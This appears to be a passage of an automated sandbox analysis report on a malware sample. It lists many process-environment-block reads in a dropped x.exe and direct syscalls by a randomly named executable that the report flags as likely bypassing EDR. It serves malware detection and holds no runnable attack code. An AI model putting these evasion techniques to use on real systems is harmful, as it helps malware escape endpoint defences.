        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D3157 mov eax, dword ptr fs:[00000030h]3_2_345D3157
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453415F mov eax, dword ptr fs:[00000030h]3_2_3453415F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D5149 mov eax, dword ptr fs:[00000030h]3_2_345D5149
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34506179 mov eax, dword ptr fs:[00000030h]3_2_34506179
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3455717A mov eax, dword ptr fs:[00000030h]3_2_3455717A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3455717A mov eax, dword ptr fs:[00000030h]3_2_3455717A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530118 mov eax, dword ptr fs:[00000030h]3_2_34530118
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450510D mov eax, dword ptr fs:[00000030h]3_2_3450510D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF13E mov eax, dword ptr fs:[00000030h]3_2_345BF13E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34537128 mov eax, dword ptr fs:[00000030h]3_2_34537128
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34537128 mov eax, dword ptr fs:[00000030h]3_2_34537128
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101C0 mov eax, dword ptr fs:[00000030h]3_2_345101C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101C0 mov eax, dword ptr fs:[00000030h]3_2_345101C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101F1 mov eax, dword ptr fs:[00000030h]3_2_345101F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101F1 mov eax, dword ptr fs:[00000030h]3_2_345101F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101F1 mov eax, dword ptr fs:[00000030h]3_2_345101F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F1F0 mov eax, dword ptr fs:[00000030h]3_2_3452F1F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F1F0 mov eax, dword ptr fs:[00000030h]3_2_3452F1F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F81EB mov eax, dword ptr fs:[00000030h]3_2_344F81EB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C81EE mov eax, dword ptr fs:[00000030h]3_2_345C81EE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C81EE mov eax, dword ptr fs:[00000030h]3_2_345C81EE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E0 mov eax, dword ptr fs:[00000030h]3_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A1E3 mov eax, dword ptr fs:[00000030h]3_2_3450A1E3
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A1E3 mov eax, dword ptr fs:[00000030h]3_2_3450A1E3
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A1E3 mov eax, dword ptr fs:[00000030h]3_2_3450A1E3
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A1E3 mov eax, dword ptr fs:[00000030h]3_2_3450A1E3
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A1E3 mov eax, dword ptr fs:[00000030h]3_2_3450A1E3
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345091E5 mov eax, dword ptr fs:[00000030h]3_2_345091E5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345091E5 mov eax, dword ptr fs:[00000030h]3_2_345091E5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F91F0 mov eax, dword ptr fs:[00000030h]3_2_344F91F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F91F0 mov eax, dword ptr fs:[00000030h]3_2_344F91F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541190 mov eax, dword ptr fs:[00000030h]3_2_34541190
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541190 mov eax, dword ptr fs:[00000030h]3_2_34541190
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34529194 mov eax, dword ptr fs:[00000030h]3_2_34529194
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504180 mov eax, dword ptr fs:[00000030h]3_2_34504180
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504180 mov eax, dword ptr fs:[00000030h]3_2_34504180
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504180 mov eax, dword ptr fs:[00000030h]3_2_34504180
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345341BB mov ecx, dword ptr fs:[00000030h]3_2_345341BB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345341BB mov eax, dword ptr fs:[00000030h]3_2_345341BB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345341BB mov eax, dword ptr fs:[00000030h]3_2_345341BB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D51B6 mov eax, dword ptr fs:[00000030h]3_2_345D51B6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345331BE mov eax, dword ptr fs:[00000030h]3_2_345331BE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345331BE mov eax, dword ptr fs:[00000030h]3_2_345331BE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453E1A4 mov eax, dword ptr fs:[00000030h]3_2_3453E1A4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453E1A4 mov eax, dword ptr fs:[00000030h]3_2_3453E1A4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F24A mov eax, dword ptr fs:[00000030h]3_2_3452F24A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF247 mov eax, dword ptr fs:[00000030h]3_2_345BF247
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459327E mov eax, dword ptr fs:[00000030h]3_2_3459327E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459327E mov eax, dword ptr fs:[00000030h]3_2_3459327E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459327E mov eax, dword ptr fs:[00000030h]3_2_3459327E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459327E mov eax, dword ptr fs:[00000030h]3_2_3459327E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459327E mov eax, dword ptr fs:[00000030h]3_2_3459327E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459327E mov eax, dword ptr fs:[00000030h]3_2_3459327E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BD270 mov eax, dword ptr fs:[00000030h]3_2_345BD270
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB273 mov eax, dword ptr fs:[00000030h]3_2_344FB273
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB273 mov eax, dword ptr fs:[00000030h]3_2_344FB273
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB273 mov eax, dword ptr fs:[00000030h]3_2_344FB273
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458B214 mov eax, dword ptr fs:[00000030h]3_2_3458B214
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458B214 mov eax, dword ptr fs:[00000030h]3_2_3458B214
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA200 mov eax, dword ptr fs:[00000030h]3_2_344FA200
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F821B mov eax, dword ptr fs:[00000030h]3_2_344F821B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34520230 mov ecx, dword ptr fs:[00000030h]3_2_34520230
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453A22B mov eax, dword ptr fs:[00000030h]3_2_3453A22B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453A22B mov eax, dword ptr fs:[00000030h]3_2_3453A22B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453A22B mov eax, dword ptr fs:[00000030h]3_2_3453A22B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34580227 mov eax, dword ptr fs:[00000030h]3_2_34580227
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34580227 mov eax, dword ptr fs:[00000030h]3_2_34580227
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34580227 mov eax, dword ptr fs:[00000030h]3_2_34580227
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D32C9 mov eax, dword ptr fs:[00000030h]3_2_345D32C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345232C5 mov eax, dword ptr fs:[00000030h]3_2_345232C5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD2EC mov eax, dword ptr fs:[00000030h]3_2_344FD2EC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD2EC mov eax, dword ptr fs:[00000030h]3_2_344FD2EC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345102F9 mov eax, dword ptr fs:[00000030h]3_2_345102F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F72E0 mov eax, dword ptr fs:[00000030h]3_2_344F72E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A2E0 mov eax, dword ptr fs:[00000030h]3_2_3450A2E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A2E0 mov eax, dword ptr fs:[00000030h]3_2_3450A2E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A2E0 mov eax, dword ptr fs:[00000030h]3_2_3450A2E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A2E0 mov eax, dword ptr fs:[00000030h]3_2_3450A2E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A2E0 mov eax, dword ptr fs:[00000030h]3_2_3450A2E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450A2E0 mov eax, dword ptr fs:[00000030h]3_2_3450A2E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345082E0 mov eax, dword ptr fs:[00000030h]3_2_345082E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345082E0 mov eax, dword ptr fs:[00000030h]3_2_345082E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345082E0 mov eax, dword ptr fs:[00000030h]3_2_345082E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345082E0 mov eax, dword ptr fs:[00000030h]3_2_345082E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34507290 mov eax, dword ptr fs:[00000030h]3_2_34507290
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34507290 mov eax, dword ptr fs:[00000030h]3_2_34507290
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34507290 mov eax, dword ptr fs:[00000030h]3_2_34507290
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E289 mov eax, dword ptr fs:[00000030h]3_2_3457E289
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F92AF mov eax, dword ptr fs:[00000030h]3_2_344F92AF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB2BC mov eax, dword ptr fs:[00000030h]3_2_345DB2BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB2BC mov eax, dword ptr fs:[00000030h]3_2_345DB2BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB2BC mov eax, dword ptr fs:[00000030h]3_2_345DB2BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB2BC mov eax, dword ptr fs:[00000030h]3_2_345DB2BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF2AE mov eax, dword ptr fs:[00000030h]3_2_345BF2AE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C92AB mov eax, dword ptr fs:[00000030h]3_2_345C92AB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345242AF mov eax, dword ptr fs:[00000030h]3_2_345242AF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345242AF mov eax, dword ptr fs:[00000030h]3_2_345242AF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FC2B0 mov ecx, dword ptr fs:[00000030h]3_2_344FC2B0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F8347 mov eax, dword ptr fs:[00000030h]3_2_344F8347
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F8347 mov eax, dword ptr fs:[00000030h]3_2_344F8347
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F8347 mov eax, dword ptr fs:[00000030h]3_2_344F8347
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E372 mov eax, dword ptr fs:[00000030h]3_2_3457E372
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E372 mov eax, dword ptr fs:[00000030h]3_2_3457E372
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E372 mov eax, dword ptr fs:[00000030h]3_2_3457E372
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E372 mov eax, dword ptr fs:[00000030h]3_2_3457E372
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452237A mov eax, dword ptr fs:[00000030h]3_2_3452237A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34580371 mov eax, dword ptr fs:[00000030h]3_2_34580371
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34580371 mov eax, dword ptr fs:[00000030h]3_2_34580371
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B360 mov eax, dword ptr fs:[00000030h]3_2_3450B360

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Benign windows process drops PE files
        Source: C:\Windows\System32\wscript.exeFile created: x.exe.0.drJump to dropped file
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtAllocateVirtualMemory: Direct from: 0x77403BBCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtQueryInformationToken: Direct from: 0x77402BCCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtOpenFile: Direct from: 0x77402CECJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtCreateFile: Direct from: 0x77402F0CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtAllocateVirtualMemory: Direct from: 0x77402B1CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtResumeThread: Direct from: 0x774035CCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtMapViewOfSection: Direct from: 0x77402C3CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtWriteVirtualMemory: Direct from: 0x77402D5CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtNotifyChangeKey: Direct from: 0x77403B4CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtSetInformationProcess: Direct from: 0x77402B7CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtProtectVirtualMemory: Direct from: 0x773F7A4EJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtReadVirtualMemory: Direct from: 0x77402DACJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtCreateUserProcess: Direct from: 0x7740363CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtQueryInformationProcess: Direct from: 0x77402B46Jump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtResumeThread: Direct from: 0x77402EDCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtWriteVirtualMemory: Direct from: 0x7740482CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtAllocateVirtualMemory: Direct from: 0x7740480CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtOpenKeyEx: Direct from: 0x77402ABCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtDelayExecution: Direct from: 0x77402CFCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtSetInformationThread: Direct from: 0x773F6319Jump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtQuerySystemInformation: Direct from: 0x774047ECJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtReadFile: Direct from: 0x774029FCJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtQuerySystemInformation: Direct from: 0x77402D1CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtAllocateVirtualMemory: Direct from: 0x77402B0CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtOpenSection: Direct from: 0x77402D2CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtQueryVolumeInformationFile: Direct from: 0x77402E4CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtDeviceIoControlFile: Direct from: 0x77402A0CJump to behavior
